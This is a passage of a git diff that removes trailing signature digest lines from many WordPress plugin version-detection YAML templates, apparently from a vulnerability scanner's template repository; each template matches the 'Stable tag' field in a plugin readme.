a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207976d3d840ef78a47264ed2e9f097ca63f0efc122f1b4b2cd73481f656d69d860221009c37484a1dcf1a90be0ecf673fa3156232ebf65d1363f1a7da3115d22ccad00a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 76c66b6c33..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206684117bcfceab307eb98330c853435152c20a846e989d2111f1c75a42c48b11022013798530b92fc4b6550b1579b7195237e8eb464b5b5670b97e843669a202e00a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index e245cf5016..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100967356fb10ef28286708a70ea558d12036e84fd6dd9ff7eacf6e04105f94be410221008d29b99d999006a633565fed1109177de81b6012dbd11487ae16180c21dcb454:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 4f114fe6dd..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203dee8250721325316b2563501d19f8ee15eebce1ac3f27a9a5feb85a855c3e400221009acb79da7a0ca223be061394ee917a506c292ff5db651c1f87e11dd529411342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index a0e0d045a7..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a0d7dc00f6c381ba893a07b649e8b5be0c595ad0ae7779a42c0eb65bad5d1653022100d18f47fa12a2ab027348abb9d2cc8b41d063b7dc1c728c2f211dab28f748ae6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index f1fffb3565..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f693c077d0c66f35c2b89872b5b862dcd4b1653f3cc45dd05309527f54850f82022100d83a767d6f169192720d0844523dad62c72f1b375b9c67593c746050aed5c024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index e8d980840b..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf6a0a1e2c8dfc0799a0846c04c676e338e5480dd87b380d1f1b9d4f388f2a4a02210088e35fafa4e6d4325400f8edabdb479a73dc48ec15ad1ed42bbcc4b3cc672caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index c017dec237..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a5a5417a1b6054d02f897a4825539303ad32370605f39c35972a0269cdfd9f502202b01962afcdd356faa430f8861789200ca011e77dcae00f4db7a1b87b76490d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 0e49ed9830..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c453a2df95d95441796d776e7ecb5020b8fa4759c501f930e8dc51acd869de610221009f19e6d82f136cdd34671a1090067c3a0a340cdb04eecbd074ad7a4edc983178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 885bbeb25e..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220145cb3688e6c5382a210945e5081850590fe3ad614666089ac9b953c6f9018b202205c8709480856d278a253562e6da6e9ee9a2a159f1ac4e1d6305877db49ceab4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index d7663273e1..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b749d23de6979db1d522948551720ab37f197e0d423a293caab40a64417cc3a02206b5e98c92906187a88bb8380366fdecac534696b3b287332914d86e16a7ffd19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index f2a05d96d4..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f59eafb3d42dd7c69419e26d7b457de0e9acd3b53d3de7634c94331ffa7f6490220113db7d9e40aa5d0e525d91370b86509ace8af094cea07f2c7ecdb82c429a35f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 724e3703f9..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022010463444cf13e1a674a096b7eda2be37ae2a7b806c66ab3081d49873dce73bb802206189273f83d2fec09f371fe173a3105e0af4a14d79784a8488279ecfe4a5005f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index b2a7ec46ab..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1d9457567627e6dbb74ee65fbf7115404df32fcf95569611ddde42bf860e6ce022100ada8c1ab180a46e2bc1d4b12ce8bb4b0427c2d5de978a30ded761049004ab77e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 39892d3320..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022030b915c0eaff62ddb0f841093ae5beca831af696b0823fb54de413b66eb4cdaa022100c210622fb8cbbb085f7a210e18d0052189021e28e338f93eeb6c7b963124e04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 5b0ccbe464..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205a02864e9bd674ace154cb15cc74dbc638cedbec01b0aadb7d243698aeb0e734022100e135032af12632a943b9646cc9df91f2ac3ee37e4a3dc944a83e59fe289eb51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index dcf503d241..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db10b615da688569ee2448361669cb0779c9b9f0145c46350a41b7e20664653602204a16e01ae8d33a136c92e358da55e66c53f65ce79a9a64443d278ee193ec7f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 6a4216fb3b..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220099b9d5e73016c96a9f6759b4d44d4e8db0c2ea5623370c0320d742bba81d61f02202f1871d7bd6ef97a03296eb383931558abb287d1102c42e417d14bb1aef4d292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index ba71e7a1e2..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061cb360bdc54b4d923bca03e277d3043c7dfacaa630baaa410cbdc75d1d4d9f3022100c36f46c42807eec68e302771ef34961c8a1881c747e065498b7ad2e36fb027ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 54558bcf24..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022003810d4bf59ece18039bfa8e5121250d0bc3b7f39d230d07219e7af302c14758022100c645f75309ea9c921b5d4e7f71abea90d0ffffa3079091e0c6aaf4896db65362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9b643600af..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b677c2157c9f97b616fcaba40f0343df9e727c020bb35a703abd83a78e0a174022016df13c5675b8445a2d94b1649f1b100272fd121093f438891c07c8be186829d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index f2192b1edf..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201b4048d0fec93bb141a2d738497450b76e4a73ab93eafb7df41eee82e1979e4d022100e77987e2b7432eccf50c4e1d49e7fd23602fe9e83e2d12f10cf189296052cd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 6a51a58d21..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017e22df5a08704af39c492ffc6fc1f18ec17cfb2a8b82ce220c51d2e91242ac8022100e2f47dd165ee412b30a46287fdcc4d5a911835ac0cf4acaaf7e8d28b53942567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 49f01b9eb0..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009cacbb29baedfd807a6fdd6c1dbd5dfaef743bb7727fcd13f07b72a3d2f0177d02205d25405c568373da0469f1d313e506d0fd30128b59fb70f085f7637345ef084e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 2f0d45fb47..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f1900a6dc5a983917ec9c11ac56e27b4ebc629406200d4dd554a8bd413d1043022100d47fc2019f58d66a65d831be092d9f44bd53e173c33ff0eec2ddc9ca6448a47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6149b493a0..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b6987176ca1d1fca93348f2d17ae5b594d50ec5c858d23a0a03dab0d4e308d8602203e12a7cc770b89fdfbb0d9f8a42c2de1865dc1f4e896ce60dfb9ed89728007e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 9be94c5838..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100875bc27a67988410e46c7f592e48c6fb8ec58c0dc5c1356cacece1a13e288224022003d06821b26cab89aed2b707a0245d6bf57377bc340a18e783d7401709043ea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 2ed4df9634..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d68154b088e3e482040b9bf68a24d085559d5f21688152c1a7f83e9eec6b0d4022100c8d43092e3bd98f0209dd66104fe76953144b61b0c339495002025e52660ae1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 3982aea83f..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203553f050d1007f538150d03e735d8623273d356e08ce14a1c9cabc3092f8f249022100dbacc86592da36404c98d48732009bd6ab5750c4cfd39fbb55294d444f257fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index ff4973b6cd..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201918395ed5a6962378da45063fcdb615318c41f42786cc626060bb0309f398cd0220159eedfa18787b160859b65edea47528d38991050b805527ce716c72f1d0995d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 853c704e6e..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206091bf1d92607e7c56866bdc655e4d7592f0af967803ea8e9ae3eaa8fcfe83f7022100dcddf2d50a6d6d0d544d641bedeb55ab1ab8630c378c407c1f7f13538063fb15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 18f952b3ec..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206fdeeb56c9e66c767ddaaa03c5e28fb6dcca74770fa28ca95d499ea4dd99a4cc022100a14e1f6398d3530281a3f767153e6d62bcdcc26dbe8b1d50f72b54090152628c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 48c63998ef..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1e69096adf02495f75b877190e93508b02ad28243d16e3e9349c13a442f4a3902206f3d84f25cb44c6e67f0991b57abceaa1c18af13b323912847195ad41bf83be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 1b33c82b48..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220567adc4323f1cce56e2001ae2c5c527629f138be436c62a8a445225da4107375022100fb26c950755258bc1b828f351dd3856fda080d2bb39aeece07be19b7cb219f43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index fc773fdfa8..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009be5fc49670b99e817edeea7cb6ebeeb380c36caba80050670a4864a63890083022068decf9ed29ae01226f626781c984eb8999c5a92ce0474c66b0cebfbbe37cbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 90944a26d8..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e9a72196169a2bda273f6c9053f5689a3226ed712c0581edac840158a81d63c022051214840beac10477cf8cc6cdbe49242875e23f9c42e397ffb80e0eb44ad9b39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 1a9d3c5b4c..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100be8f8f6fe5c026e226a28d4addedf62432a8af25fdd1c9d5395baea78b5290b402205e27aeb1dd19e9fd60d56ed4ede7a5d0dea546e6e0b4e9824a51eff164649281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 968b0fd16d..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c13d6913e18d9f3763a32892922c5a26f94f64023acdbf43d72ad53483036aea0221008337717fa1bb5bb4c4b8815ac0650c1cb17969d0d79f67f9cd5c20c3d924061c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index e10649a204..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a66e91ecfcf51f779938971aff97145737f8521decc035c3ae0556249fd138a022100c00d228bbd57390d4c1d0bc32916c9b3b8bd8f400aa173fb4fe5932ea53a379c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index c7c3e7aa83..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c89c6a7f323e9f8a3b1e85eb7ee35e7af6689164fb6856a99dbc51f45296a4e3022000c39c513229b53c67f2b80f78b525c95036d04f723fa827785a210b72ca922e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index f53fb6ec9d..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100baf473a88ffe645cdccb59e2f339e9922a76a3aee02908f491ea41bcf3082ed6022003d5de7129d70b8685a0eaadf8a97d7a1a48f9b14c572ce706c7ad7d03b4f180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 6b57fe40dd..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e1970bac91e59cc353b3df3581afeed45c076b94ccec54ac804a1bb9bb5df8002200dce11266707fd95f522cd50f9a33977d1419f02b47663c2c79c3c4eee01d013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index c7a7b2d4f8..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087485d6b01bbadd188de5da50e0916128ffad2ab8b6a5eea0bf6d3f7421afc3e02200256875106937d8cc91c1c0ae9d1836d106494d04efaef0c28ec02042afef391:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2387628ab6..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d15650f35b369222d3ef23f756c3ddb1b0ad53e6c4f5aa5aaa19429e9d1810f022100f4a6150b59ac2cf60ba6262cf052d743405e80497fc62b3ef50f1d6088aaca13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 4f3ae186a9..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a33ab72b6ebfd24e7862c91c1de5697e85fb811427d23971f25335a16c9129ef022100f5cba78ecc1b84262ea7c52086d32bf211a91d2bffeeea45713cb6372c24eddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 6f957877a8..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203e1259675b63ec20be1c0cb0039e5265f635d264b305e9cb901412aefa851c89022100dc969fff69e4175f868472c9be7d737d33c86dd61084decb44421f0e1d43a482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index aac6a14960..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e549915d166379adaabf2d4669f50b571cb332613cd1c5a0c15bff3c3e53e0a7022041155cb555d0e4f03740cd21a0a8f355a0ddfe2a8f380b6bb264a2ee26e1daf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml 